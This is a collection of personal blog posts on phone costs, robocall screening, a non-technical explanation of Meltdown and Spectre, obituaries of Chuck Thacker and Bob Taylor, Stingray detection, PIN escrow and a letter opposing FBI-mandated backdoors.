Are iPhones expensive?

The most expensive iPhone is now $1449, for the 512 GB iPhone XS Max.  That is crazy … right?
I looked around and found some other interesting numbers.

  • The average replacement cycle for cell phones in the US in 2017 was 32 months.
  • The average cell phone bill in the US is now over $80/month.

I dusted off my multiplication skilz:  32 times 80 is $2560. $1449 divided by 32 is $45.
So who is making money on phones?  The answer is Verizon, ATT, T-Mobile, Sprint…
iPhones are expensive compared to many perfectly serviceable phones, but they are not expensive compared to the service providers.
Phones are a competitive market.  I’ve owned both Apple and Android phones  They are fine.  If you think iPhones are too expensive, don’t buy them.
My own solution to the “Apple products are too expensive” was to buy some Apple stock.  It has worked out well.

Telephone Captcha

Something called during dinner yesterday.  I hung up almost immediately, but commented to the family that it is getting harder to quickly identify recorded calls.
My 16 year old Andrew remarked that I should ask for the answer to 1 plus 1.
He’s invented telephone captchas!  When you get a call and you can’t quite tell if it is a person, ask them a math question.  If you don’t get an immediate correct answer, hang up.
There’s a subset of robo callers with a recording that pauses in almost human places, and makes small talk about your expected answers.  I find this trend alarming and suspect it takes in lonely seniors pretty well.
Personally, I’ve gotten to where I don’t bother talking any more, if there is any sort of a pause after my hello, or anything recorded or that I can’t interrupt, I just hang up.  As they get better though, I’m going to use telephone captchas.
 

Meltdown and Spectre

The technically inclined can read the papers at Meltdown and Spectre but I will try for a less technical explanation.
Processor chips are supposed to be able to run multiple programs at once, while keeping the data of each program secret from the others. There is a special privileged program, called the operating system kernel, that coordinates all the activity. The kernel is necessarily allowed to read the data of any user program.
This isolation between the data of different programs, and between the secret data of the kernel and that of all user programs, is done by something called virtual memory. VM gives each program the illusion of a private memory space while in fact all the programs are using bits of the underlying real memory in a way coordinated by the kernel.
A user program simply does not have any way to ask for the contents of arbitrary real memory (and thus be able to read secrets of other program.) The memory of other programs is not present at all in the virtual memory of the attacker.
The relation between the user programs and the OS is a little different. For convenience, the kernel ususally has the entire physical memory “mapped” in its own virtual address space, and the kernel’s virtual space is also present in the virtual space of every user program. This is not supposed to be a problem because the kernel part of the memory is marked “kernel use only” and that restriction is enforced by the hardware. If a user program tries to read kernel memory, the hardware says “nope!”.
All this is just background.
Meltdown is a way for user programs to read kernel virtual memory, even though they are not supposed to be able to do it.
Spectre is a way for user programs to read the virtual memory of other user programs, even though they are not supposed to be able to do it.
Virtual memory is only one of the ways in which processors present a view that is different from the underlying reality. Another is the so called “architecture”. Most PC’s have an architecture called x86, due to Intel. AMD also makes chips with an x86 architecture. The architecture is the stuff that is visible to a program: instructions, registers, memory, and so forth. The general outline of a computer architecture is that of a central processing unit, containing registers and instructions, which talk to a memory unit, containing data. Neither thing is true, and hasn’t been true for 30 years.
Memory isn’t simply memory anymore! If you’ve looked inside a PC, you’ve seen those flat rulers with chips on them plugged in edgewise to the motherboard. Those are main memory. That part is true. The problem is that they are way too slow. It can take 60 to 100 nanoseconds to get data from main memory. In that time, the CPU can execute maybe 200–300 instructions. Something had to be done. Inside the CPU chip, there are smaller faster memories called cache. They automatically hold the most recently accessed and most frequently accessed data from memory. This works because programs tend to access the same stuff over and over and also to access nearby stuff.
CPUs aren’t just CPUs anymore! Executing a single instruction involves a 5–10 step process, fetching the instruction, decoding what it means, fetching the data it needs, maybe doing some complicated arithmetic, and storing the answer back where it goes. If CPUs did these things one at a time, they would be too slow, so the operation of many instructions are overlapped in a pipeline of work. It turns out that that is not nearly enough speedup, so many modern CPUs execute instructions “out of order”. They look ahead at instructions that are coming up and do as many as they can, even though earlier instructions have not finished. In order to avoid vast confusion, instructions are only allowed to finish in order, with “later” results being held in temporary storage until earlier instructions finish, even though all the work for the later instructions has already been done. Modern CPUs also engage in “speculative execution” which means they actually guess at what instructions will need to be executed sometime in the future and do them right away. Things like this happen due to IF THEN ELSE instructions in the program that could cause different instructions to execute. The CPU doesn’t really know which way the IF THEN ELSE (called a branch) will go, so it makes a very well educated guess.
Out of order and speculative execution are especially interesting due to those long memory delays. The CPU can be thinking about and running instructions several hundred instructions ahead of the “commit point”.
None of this violates the architectural rules. The program doesn’t see the results of instructions that were never supposed to execute, and can’t read memory it is not entitled to see…. Well it turns out it can.
The trick of Meltdown allows a program to read kernel virtual memory even though that is forbidden. The meltdown program, by some modest bluffing, tricks the CPU into speculatively executing a read from kernel memory and then using the result to choose which data to read from user memory.
The results of these reads are never reported to the user program, and in fact by the time the program logic gets to that point, the CPU knows the read would never have been executed anyway, so it doesn’t even produce the exception that would normally happen when a user program breaks the rules and tries to read kernel memory.
But… in the underlying physical machine, the microarchitecture, the reads from memory did happen, and that data was read into the caches we talked about earlier.

The user program can then measure how long it takes to read each location in the user memory and figure out that one of them is a lot faster than the others.  That one is the one that was already brought into cache by the read that was never supposed to happen.
In short, the CPU speculatively executes a forbidden instruction, and leaves faint echos in the timing of reading different memory locations, and those echos permit the meltdown attack to read, pretty quickly and reliably, secret data from the OS kernel.
Spectre is even more subtle.  In Spectre, a user program can affect the behavior of a different user program by tricking the processor into speculatively executing a read whose address is under control of the attacker. The program being attacked would never do this normally, and doesn’t even find out about it, because all the speculative work is thrown away. However, in the underlying hardware, the read did happen and leaves some of those faint echos in the form of detectably different timing of events that the attacker can measure.
Spectre can work in at least two environments but the important case affects web browsers.  Web browsers run programs downloaded from web sites that are written in a language called Javascript.  These programs are known to be suspect, since really, one shouldn’t trust anything found on the internet.  Javascript programs are run in a very constrained “sandbox” that they are not supposed to be able to get out of nor are they supposed to be able to access data outside the sandbox.  Spectre allows a Javascript program to read data outside the sandbox and potentially read passwords or other secret data stored elsewhere in the web browser.
None of this is new, unfortunately!  Processor chips have had the features that enable Meltdown and Spectre for over 20 years, and they went unnoticed.  Fortunately, Meltdown is relatively easy to fix in software, at some cost in performance, by patching the operating system,  If kernel memory is not mapped into user space, even with protections, then the user program cannot learn anything.  Spectre is harder to fix and at present seems to require patching every program individually that you wish to protect.  And this is the good news!
This business of computers leaking information by subtle changes in timing that can be caused by and measured by an attacker is a kind of thing called a “Side Channel Attack” in the security business.  Unfortunately, there is no general way to protect against side channel attacks.  All that anyone knows how to do is to limit the rate at which the attacker can steal data.  That’s good if you are trying to prevent the theft of something big, like a digital movie, but it doesn’t really help if you are trying to prevent the theft of something small, like a password.
Already in the month or so since Meltdown and Spectre came to light we have additional problems, such as “Meltdown Plus” that exploits a completely different microarchitectural mechanism.
It may be that the only thing to do is to have multiple small CPUs that are really quite independent, so you never never run untrusted software on the main processor, but only in a private little machine that shares nothing

Chuck Thacker

Chuck Thacker died yesterday, and the world is poorer for it.
Chuck won both the Draper prize and the Turing award. He’s been described as “an engineer’s engineer”, epitomizing Antoine de Saint-Exupery’s remark that “Perfection is achieved not when there is nothing more to add, but when there is nothing left to take away.” He established a track record of simple, beautiful, and economical designs that is exceedingly rare.
Over the last day I’ve been struggling with how to explain Chuck to non hardware engineers.  He could achieve amazing results with fewer components than anyone else and yet after the fact, mere mortals could understand what he had done.  But he also understood the physics and technologies very well, and knew just where to apply the unusual part or custom design to make the entire project coalesce into a coherent whole. If you are a software developer, think of Chuck as someone like Niklaus Wirth who invented Pascal. If you are an aviation buff, think of Chuck as someone like Kelly Johnson who designed the SR-71. Chuck really was at that level.
I had the privilege to work directly with Chuck on three different computer system designs.  I was a coauthor on several papers with Chuck and coinventor on a networking patent, so I suppose my Thacker number is 1.
I first met Chuck Thacker when I was a summer intern at Xerox PARC in 1977.  We both joined Digital Equipment’s Systems Research Center, working for Bob Taylor, in 1984.  At SRC, Chuck led the design for the Firefly multiprocessor workstation.  I wrote the console software for the 68010 version, and designed the single and dual microvax CPU modules. I wanted to add sound I/O to the Firefly and Chuck helped me figure out how to do it by adding only three chips to the design for the display controller.
Later at SRC Chuck launched the idea of the “Nameless Thing” which was to be a liquid immersion cooled computer built around an ECL gate array running at 200 MHz.  I worked on the first level caches, to be built out of 1.2 nanosecond Gallium Arsenide static rams.   We had to rewrite the CAD tools to get sensible board layouts that could run at those speeds.
NT was never built because it was overtaken by the Digital Semiconductor Groups’ design of the first Alpha processor. Chuck led a team of Digital Research folks to build development systems for the Alpha chip.  The effort was credited with advancing Alpha’s time to market by about a year. At the time, Digital had a standard design for multiprocessor systems based on the “BI” bus.  The specification ran to over 300 pages.  Chuck was incredulous, and worked out a design for the Alpha Development Unit multiprocessor bus that was 19 pages long.  The Alpha EV-3 and EV-4 chips were very unusual in that they could be configured for either TTL signaling on the pins, or ECL signaling.  The ADU became an unrepentant ECL design.  Strict adherence to ECL transmission line signaling and a complete disregard for power consumption allowed for exceeding fast yet low noise signaling.  Chuck designed the bus and the memory system.  If I remember correctly, he commissioned Gigabit Logic to build custom address line drivers so that the memory would meet timing.  Dave Conroy designed the CPU module, and I designed the I/O module.  I recall that SRC built the chassis and ordered cables for the 400 amps of -4.5 volts from a local welding shop.  They asked “what kind of welder needs 18 inch cables?”
I learned a tremendous amount from Chuck’s economy of design and from his ability to make hardware vs software tradeoffs to achieve simplicity.  I also learned that it was completely allowed to rewrite all the software tools to make them do what you want.
Chuck was a “flat rock engineer”, in his own words.  The reaction of such a person to a new project is to first rub two rocks together to make a flat working surface. He was a lifelong opponent of complexity, not only in hardware, but in software as well, remarking that unnecessarily complicated software was apt to collapse in a rubble of bits – a phrase I adopted as the title of this blog.
Chuck Thacker was unique, and I deeply mourn his passing.  Evidently he didn’t wish a memorial service, but I think the duty falls on all of us to edge our designs a little closer to simple, elegant, straightforward, and beautiful.
 

Bob Taylor

Robert W. Taylor died yesterday.  While working at ARPA, he funded the work that led to the Internet.  He managed the legendary Xerox PARC Computer Science Lab, where the Alto and the Ethernet were created. He won the National Academy of Engineering’s Draper Prize. You can read about these things more elsewhere.
Bob Taylor hired me, with my new PhD, into CSL.  Later, he hired me again, at the Digital Equipment Systems Research Center.  I learned not everything I know, but quite a lot of it, on his watch. Bob had the special genius of assembling groups of people who could invent the future.
At Xerox, the weekly group meetings were called Dealer, as in Dealer’s choice.  The speaker set the rules.  The culture was for the audience to do their level best to challenge the ideas.  Bob talked about civility, and about the necessity of “turning type one disagreements into type two disagreements”.  A type two disagreement is where each party understands and can explain the position of the other.
I was first exposed to CSL as a research intern while a graduate student. On either side of my office were Dave Gifford and Eric Schmidt. When I graduated, I turned down a couple of faculty appointments to stay at CSL. There was no place else that had the same concentration of talent and the freedom to build new things.  Both of those factors were the work of Taylor.  He felt his job was building the group and building the culture, then defending it from outside influence.
In 1984, corporate finally got the best of him and Taylor left to start the Systems Research Center at Digital Equipment.  I was number 24 to quit and follow him.  Against all odds, Taylor repeated his success and built another outstanding research group at Digital.  Occasionally, some dispute or other would arise, and folks would go complain to Bob.  He had a plaque on his wall “Men more frequently need to be reminded than informed.”  Bob would gently remind us of the rules of disagreement.
It’s not well known, but Taylor was from Texas and a little bit of the Lone Star State followed him around.  One time, Dave Conroy and I had succeeded in getting a telephone audio interface running on our lab-built Firefly multiprocessor workstations, and mentioned it on our way out to lunch.  When we got back, we found Taylor had dialled in and left us a 30 second recording.  Dave and I knew this had to be preserved, but the test program we had had no code to save the recording!  Eventually, we sent a kill signal to create a core dump file and fished the recording out of the debris.  Here’s Bob Taylor:

 
 

Go Square!

I got a misaddressed email today, with a receipt for someone’s Square account.
At the bottom, there is a button “Not your receipt?”
When clicked, the page reads “Someone must have entered your email address” with an option to unlink it.  Easy and sensible.
This is by far the best design I’ve encountered.
 

Wikileaks Bait

One of the interesting developments in the 2016 electoral cycle is the use of offensive cyberespionage.  Wikileaks is publishing internal email from the campaign of Hillary Clinton, with the publications timed to attempt to damage the campaign.
Maybe this is the work of Russian spies, with Wikileaks an unwitting stooge, maybe not, but the case is quite interesting.
What should a campaign organization, or corporation, or government agency do?  Their emails may be next.
One possibility is to salt the email stream with really tempting tidbits suggesting illegal, immoral, or unethical behavior, but also put these emails in escrow somewhere.  Then, when the tidbits come to light, you can derail the news cycle with one about how your infosec team has pwned the leakers and trolled the media.
The technique will only work the first time, but even later, professional news organizations are not going to want to take the chance that their scoop is a plant.  That is how Dan Rather lost his job.
If the plants are subtly different, they could also be used to identify the leaker or access path.  (This was suggested in “The Hunt for Red October” by Tom Clancy, written in 1984, but the idea is surely older than that.)
More on point, it should be obvious at this point that email is not secret, nor is any electronic gadget secure.  [[ How do you identify the spook? She’s the one with a mechanical watch, because she doesn’t carry a phone. ]]
Until we get secure systems, and I’m not holding my breath, conspirators really shouldn’t write anything down.  In the alternative, their evil plans must be buried in a sea of equally plausible alternatives.
 

Stingray countermeasures

A Stingray is a cell tower lookalike device.  It broadcasts its presence and nearby phones connect to the Stingray thinking it is a legitimate tower.  The Stingray can then log each phone or act as a man in the middle to incercept call metadata, text messages, or even call contents.
There are a number of public databases of legitimate cell towers.  For example, http://opencellid.org  Some databases are government, for example, the FCC license database, while others are crowdsourced.
It should be possible to modify a phone to only connect to towers which are legitimate by checking the purported tower ID against a cached copy of the database for the local area.  A stingray could, of course, use the id of a real tower, but that would disrupt communications in the whole area. This might not prevent the Stingray from logging the presence of such a phone, since the Stingray could hear the protocol handshake with the legitimate tower.
It should also be possible for a phone to passively listen for tower broadcasts, and to compare the tower ID against the database,  An unknown ID might be a new legitimate tower or it might be a Stingray.
It is likely quite difficult to get at and modify the low level radio software in a commercial smartphone, but there is a complete open source suite of cell infrastructure software at http://openbts.org
That code could serve as a starting point for a software defined radio device for detecting and tracking Stingrays.  One could make a box with a red light on top which lights up when there is an unknown tower in the area.
In some areas, use of Stingray devices requires a warrant, but this is not universal.  The courts have also determined that use of location data from legitimate cell towers does not require a warrant
.
.

PIN Escrow

The FBI has dropped their request to require Apple to write code to unlock the terrorist iPhone.  Supposedly a third party offered a way in.  Yesterday the FBI said they did get in, so they no longer need Apple’s help.
For those whose first instinct is to distrust the government, this looks like the Justice department realized they were going to lose in court and hastily discovered a way out. “Never mind”.  This preserves their option to try again later when public opinion and perhaps law would be more on their side.  I am a little reluctant to think Justice would outright lie to a federal judge, but it wouldn’t be the first time.
This morning on NPR there was a different sort of heartbreaking story.  A woman and her baby were murdered, and there might be evidence on the woman’s phone, but it can’t be unlocked.  So what to do?
My idea is “PIN Escrow”.  Everyone should have a letter written with a list of their accounts and online passwords, to be opened by someone in the event of death or disappearance.  Everyone should have a medical power of attorney and so forth as well, to give a family member or trusted friend the power to act for you in the event of a sudden disability.  Just add your smartphone PIN to the letter,
In the alternative, one could write an app that encrypts your pin with the public key of an escrow service and sends it off.  This facility could even be built into the OS, with opt-in (or even opt-out, after a sufficient public debate), so it would automatically track changes.  The government could operate such a service, or it could be private.  There could be many such services.  Some could be offshore.  Some could use key-sharing for the private key, so PIN recovery could not be done in secret.
Let’s leave it up to individuals whether they want someone to have the power to unlock their phone in the event of an emergency.
From a security perspective, a PIN escrow service would be a dangerous and attractive target, so such a thing would have to be well designed in order to be trustworthy.  It should be kept offline, with no network connection.  The private key should be in a hardware key module.  Several people would have to collude in order to unlock a key, and there ought to be hardware safeguards to prevent bulk PIN recovery.
This is not a general back door for government surveillance, it wouldn’t grant remote access to a phone.  It wouldn’t be useful for hacking into criminal’s or terrorist’s phones (if they are smart), but it might help in cases where the phone owner is the victim of tragedy or accident.
And if you change your mind about having your PIN escrowed?  Just change your PIN.
 

Apple v FBI

I’m beginning to build up a full head of steam.  The first step seems straightforward.  I’m going to write my congressman.  It may not have much effect, but if enough of us write, it might.
Here’s my letter to Massachusetts Senator Elizabeth Warren.  I’ll be sending similar letters to Sen. Ed. Markey and Rep. Katherine Clark.
2016, March 16

The Honorable Elizabeth Warren
317 Hart Senate Office Building
Washington, DC 20510

Dear Senator Warren:

I write about the Apple FBI affair.  Please oppose any attempt by government to weaken the security and privacy of all Americans by demanding security “backdoors” in our technology or to require the conscription of Americans or American companies to weaken their own security.

First, regarding backdoors. I hold a PhD in Electrical Engineering and have worked with computer systems and computer security for over 40 years.  I am coauthor of the well-regarded book on E-commerce systems “Designing Systems for Internet Commerce.”  In other words, I know quite a lot about this area.  There is simply no way to create a backdoor that does not also reduce the security of the system for everyone.

Second, speaking as an ordinary citizen, I do not know how the courts will rule on the government’s request to use the All Writs Act to compel Apple to write software to unlock the San Bernadino iPhone, but my own view is that the constitution does not and should not allow it.

The government is being deliberately disingenuous when it claims this case is only about one terrorist’s phone. I have no sympathy for the killers, but the privacy and security of everyone is at risk should the government prevail.  Should that happen, I expect you to propose and support legislation that outlaws backdoors and forbids the conscription of individuals or companies into the government’s service.  This has happened before.  In 1980, Congress passed the Privacy Protection Act of 1980 which corrected the overreach of government in Lurcher v. Stanford Daily.

Sincerely yours,

Lawrence C. Stewart